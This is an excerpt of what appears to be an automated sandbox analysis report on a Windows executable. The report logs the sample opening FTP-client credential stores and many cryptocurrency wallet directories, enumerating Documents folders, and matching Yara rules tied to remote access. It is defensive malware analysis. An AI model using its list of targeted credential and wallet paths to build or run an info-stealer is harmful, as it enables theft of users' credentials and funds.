Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: C:\Users\user\Documents\MQAWXUYAIK
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Directory queried: number of queries: 1001
Source: Yara match File source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR